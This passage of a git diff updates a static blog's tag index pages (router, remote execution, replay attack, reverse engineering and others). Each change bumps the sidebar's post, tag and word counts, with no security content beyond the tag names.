       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/tags/自然语言处理/index.html b/tags/自然语言处理/index.html
index 2c02de8f..df9f38bc 100644
--- a/tags/自然语言处理/index.html
+++ b/tags/自然语言处理/index.html
@@ -377,7 +377,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -399,7 +399,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/tags/访问控制/index.html b/tags/访问控制/index.html
index 18335a2c..9913716d 100644
--- a/tags/访问控制/index.html
+++ b/tags/访问控制/index.html
@@ -377,7 +377,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -399,7 +399,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/tags/路由器/index.html b/tags/路由器/index.html
index ac468441..ca5adc69 100644
--- a/tags/路由器/index.html
+++ b/tags/路由器/index.html
@@ -377,7 +377,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -399,7 +399,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/tags/远程执行/index.html b/tags/远程执行/index.html
index 855f553d..a5716170 100644
--- a/tags/远程执行/index.html
+++ b/tags/远程执行/index.html
@@ -377,7 +377,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -399,7 +399,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/tags/逆向/index.html b/tags/逆向/index.html
index 7e2c12c6..54df5c14 100644
--- a/tags/逆向/index.html
+++ b/tags/逆向/index.html
@@ -377,7 +377,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -399,7 +399,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/tags/重放攻击/index.html b/tags/重放攻击/index.html
index 904ac409..cee00a04 100644
--- a/tags/重放攻击/index.html
+++ b/tags/重放攻击/index.html
@@ -377,7 +377,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -399,7 +399,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>